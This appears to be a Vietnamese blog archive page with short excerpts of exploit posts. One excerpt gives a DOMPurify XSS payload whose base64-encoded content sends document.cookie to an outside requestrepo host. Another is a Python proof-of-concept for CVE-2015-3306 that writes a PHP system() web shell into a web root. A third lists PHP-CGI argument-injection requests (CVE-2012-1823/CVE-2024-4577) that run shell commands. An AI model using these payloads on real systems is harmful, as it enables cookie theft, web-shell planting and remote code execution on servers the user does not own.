Bài đăng

Đang hiển thị bài đăng từ Tháng 1, 2025
Hình ảnh
 Book Dompurify 3.2.2 co vuln nhung ko exploit dc payload http://172.31.3.2:8000/book?title=PGgxIGlkPSJjb25maWciPjxoMSBpZD0iY29uZmlnIiBuYW1lPSJERUJVRyI%2BPC9oMT48L2gxPg%3D%3D&content=PGltZyBzcmM9eDogb25lcnJvcj0iKG5ldyBJbWFnZSkuc3JjPScvL3Bnb2hpaGd2LnJlcXVlc3RyZXBvLmNvbT8nK2RvY3VtZW50LmNvb2tpZSI%2BDQoNCg%3D%3D
Đăng nhận xét
Đọc thêm
└─$ source venv/bin/activate
Đăng nhận xét
Đọc thêm

CVE-2015-3306

#!/usr/bin/env python3 import sys import socket import requests def exploit ( client , target ):     client .connect(( target , 21 )) # Connecting to the target server     banner = client .recv( 74 )     print ( banner .decode())     client .send( b 'site cpfr /proc/self/cmdline \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /tmp/<?php system("id"); ?> \r\n ' ) # phpinfo() is just a PoC.     print ( client .recv( 1024 ).decode())     client .send( b 'site cpfr /tmp/<?php system("id"); ?> \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /var/www/html/konchan.php \r\n ' )     print ( client .recv( 1024 ).decode())     client .close()     print ( 'Exploit Completed' ) def check ( url ):     req = requests . get ( url ) # Requesting the written PoC php file via HT...
Đăng nhận xét
Đọc thêm

CVE-2012-1823/CVE-2024-4577

CVE-2012-1823 && CVE-2024-4577 (PHP CGI ARGURMENT INJECTION) $HOST /?-f C:\Windows\System32\Drivers\etc\hosts $HOST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input <?php system("ls -la"); ?>
Đăng nhận xét
Đọc thêm